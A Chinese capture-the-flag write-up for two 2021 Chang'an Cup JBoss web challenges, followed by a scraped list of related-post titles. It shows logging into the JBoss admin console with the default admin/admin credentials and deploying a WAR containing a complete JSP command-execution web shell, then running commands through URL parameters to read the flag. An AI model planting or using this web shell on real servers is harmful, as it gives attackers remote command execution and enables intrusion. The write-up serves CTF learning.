CTF_Web:长安杯-2021 Old But A Little New asuka题解
0x00 Old But A Little New
两个JBoss题目几乎一模一样,解法也相同,题目只考一个内容,就是Jboss后台上传war包getshell。
首先是一个jboss页面。
后面的wiki等等连接都在jboss的官网,与本题没有关系。
0x01 弱口令登录
第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。(这里的shell.war是已经上传好的)
0x02 上传war包getshell
在这里使用的是TsengYUen师傅的回显jsp一句话,然后使用命令打包。
jar cvf shell.war 1.jsp
一句话的内容为:
<%if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>
部署成功后查看自己的war包:
路径为/shell/1.asp
网页连接列目录
http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=ls
直接cat flag即可。
http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=cat%20flag
0x03 asuka
JBoss系列的题目,与上一个JBoss相同的解法,用同一个war包即可。命令执行获取flag
CTF_Web:长安杯-2021 Old But A Little New asuka题解相关推荐
- 第十二届蓝桥杯2021年C++A组省赛题解
文章目录 注 考生须知 试题A:卡片 试题B:直线 题解 代码(set + map) 试题C:货物摆放 题解 代码 试题D:路径 题解 代码 试题E:回路计数 题解 代码 试题F:砝码称重 题解 代码 ...
- 2021 长安杯 Re
2021 长安杯 Re 忙了半天,就肝了两个Re,其中一个还是比赛结束后才出的,菜的令人发指,呜呜呜!!! 1.Fantasy apk逆向,查了一下,没有加固,直接在 jadx-gui 当中打开,可以 ...
- 第三届长安杯解析(2次修订版)镜像+具体解析+个人详细解题过程,涉及多个模块,我会努力把所有写好,可以做一下题目,提升很明显。
第一次写的太烂了,看到其他大佬写的我很羞愧,所以努力修订. 长安杯链接: 链接:https://pan.baidu.com/s/1PIJpKRpn5H94_bxbOJIO0w?pwd=ybww 提取码 ...
- 沈抚示范区·“华为云杯”2021全国AI大赛圆满落幕
摘要:以赛促学,赛教结合!驱动AI产业繁荣发展 本文分享自华为云社区<云聚沈抚 · 智赢未来!沈抚示范区·"华为云杯"2021全国AI大赛圆满落幕>,作者:灰灰哒. 近 ...
- 2020第二届长安杯电子数据竞赛试题(二次修改版),本人亲解,尽量做到细致仔细,镜像百度网盘奉上,建议大家联系一下,弘连题目还是很好的(强烈推荐)
百度云链接 链接:https://pan.baidu.com/s/1iEItwBUZx6X4_oe_ZfQlvw?pwd=ybww 提取码:ybww -来自百度网盘超级会员V2的分享 如果链接失效了, ...
- 22长安杯——个人赛
学习学习!!!太难了... 容器加挂密码:2022.4th.changancup! 目录 一.案件背景: 二.题目 检材1 [网站前台] [网站后台] 检材2 检材3 检材4 加密勒索apk程序 一. ...
- 【pwn】长安杯baigei
[pwn]长安杯baigei 前言 这场和das月赛重了,当时这个baigei题没仔细看,长安杯就解了两道jar包web的送分题,国庆开始补题 漏洞分析 最基本的菜单,增删改查都有的那种,漏洞在于ad ...
- 第十二届蓝桥杯 2021年省赛真题 (Java 大学B组) 第一场
蓝桥杯 2021年省赛真题 (Java 大学B组 ) #A ASC #B 卡片 朴素解法 弯道超车 #C 直线 直线方程集合 分式消除误差 平面几何 #D 货物摆放 暴力搜索 缩放质因子 #E 路径 ...
- 第十二届蓝桥杯 2021年省赛真题 (Java 大学A组) 第一场
蓝桥杯 2021年省赛真题 (Java 大学A组 ) #A 相乘 朴素解法 同余方程 #B 直线 直线方程集合 分式消除误差 平面几何 #C 货物摆放 暴力搜索 缩放质因子 #D 路径 搜索 单源最短 ...
- 2022长安杯复盘——lucid凡
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用"USTD币"购买所谓的"HT币",受害人充值后不但 "H ...
最新文章
- srs audio sandbox 注册机_Windows10自带 Sandbox软件测试必备技巧
- freemarker include 和 import
- 【Python】 list dict str
- Android IllegalStateException: The specified child already has a parent问题解决办法
- Java黑皮书课后题第10章:*10.14(MyDate类)设计一个名为MyDate的类
- android产品设计,Android产品设计
- 控制SAP Spartacus shipping address页面spinner显示的逻辑
- LeetCode刷题——Z字形变换
- hadoop.2.6.0安装hive.1.2.2
- VG SketchPad编辑器——可嵌入的jQuery插件
- Abp vnext 特征(Features)
- Linux(ubuntu)下打包 解压
- Echarts 3使用
- 《出版专业实务·初级(2020版)》学习笔记
- javascript通过银行卡号识别所属银行
- “云”溪笔谈 | VR——看得见的未来
- ARouter路由解析
- 保研历程(经验分享、保研流程介绍)
- 面向需求编程才是常态,聊聊我的经历
- C#面向对象程序设计课程实验一:实验名称:C#语言基础、程序流程控制